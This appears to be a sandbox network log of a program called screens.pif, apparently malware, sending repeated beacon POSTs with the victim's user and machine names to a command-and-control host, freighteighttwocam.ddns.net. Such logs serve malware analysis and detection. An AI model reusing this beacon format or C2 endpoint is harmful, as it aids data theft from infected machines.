Oct 3, 2024 09:21:15.448180914 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49733	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:15.625766993 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:15.631001949 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:17.426115990 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49734	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:17.613740921 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:17.618666887 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:18.676727057 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49735	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:18.843678951 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:18.848565102 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:19.691886902 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49736	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:20.067845106 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:20.073299885 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:20.383909941 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:20.718350887 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49737	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:20.889588118 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:20.894548893 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:21.526664019 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49738	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:21.704443932 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:21.709486008 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:22.447510004 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49739	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:22.726998091 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:22.731827021 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:23.391484976 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49740	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:23.536640882 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:23.541526079 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:24.274101019 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49741	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:24.424740076 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:24.429750919 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:25.101639986 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49742	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:25.251813889 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:25.256730080 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:25.961544037 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49743	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:26.113770008 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:26.118736029 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:26.738610029 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49744	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:26.892745018 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:26.897708893 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:27.713023901 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49745	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:27.867804050 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:27.873598099 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:28.560340881 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49746	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:28.706788063 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:28.712017059 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:29.491594076 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49747	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:29.649656057 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:29.654591084 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:30.421461105 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49749	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:30.586230993 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:30.592777014 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:31.421685934 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49750	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:32.595339060 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:32.603611946 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:33.372004032 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	49751	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:33.521265984 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:33.526237965 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:35.070930958 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:35.071086884 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:35.071223974 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	49752	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:35.220405102 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:35.225313902 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:36.956888914 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	49753	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:37.116375923 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:37.121380091 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:42.165158033 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	49754	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:42.312860966 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
